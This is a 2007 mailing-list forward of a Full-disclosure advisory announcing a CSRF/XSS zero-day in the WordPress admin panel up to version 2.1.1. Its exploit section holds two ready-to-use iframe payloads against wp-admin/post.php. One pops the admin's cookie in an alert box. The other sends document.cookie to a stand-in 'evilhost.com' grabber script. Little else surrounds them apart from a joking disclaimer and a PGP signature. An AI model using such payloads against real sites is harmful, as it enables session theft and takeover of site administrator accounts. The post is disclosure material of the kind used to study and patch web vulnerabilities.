[wp-hackers] FW: [Full-disclosure] WordPress AdminPanel CSRF/XSS -
0day
Ross M. W. Bennetts
ross.bennetts at une.edu.au
Tue Feb 27 00:15:51 GMT 2007
-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of SaMuschie
Sent: Tuesday, 27 February 2007 7:51 AM
To: webappsec at securityfocus.com; bugtraq at securityfocus.com;
vuln-dev at securityfocus.com; full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] WordPress AdminPanel CSRF/XSS - 0day
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
+---------------------------------------------------------------------------
+
| SaMuschie Research Labs proudly presents . . .
|
+---------------------------------------------------------------------------
+
| Application: wordpress Version: <= 2.1.1
|
| Vuln./Exploit Type: AdminPanel CSRF/XSS Status: 0day
|
+---------------------------------------------------------------------------
+
| Discovered by: Samenspender Released: 20070226
|
| SaMuschie Release Number: 1
|
+---------------------------------------------------------------------------
+
Exploit:
Cookie in an Alert Box:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>
Cookie send to an Evil Host:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/
datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></ifra
me>
+---------------------------------------------------------------------------
+
| Lameness Disclaimer
|
+---------------------------------------------------------------------------
+
| SaMuschie Research Labs was found to publish vulnerabilities within well
|
| known software products, which are easy to discover and exploit.
|
|
|
| SaMuschie researchers just spend a minimum of time and knowledge for each
|
| vulnerability. Hence readers of this advisory are requested not to ask
|
| any questions to the researchers.... they don't know the answer ;)
|
+---------------------------------------------------------------------------
+
+---------------------------------------------------------------------------
+
| EOF
|
+---------------------------------------------------------------------------
+
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFF4xadMFgfGpQK8VERAkO5AJ9V8uosk2DATRTARHDhPxNe+RHirgCeKQ0h
aFgDpHnxPP+/4Ot5bLBZy9Q=
=/gS4
-----END PGP SIGNATURE-----
More information about the wp-hackers
mailing list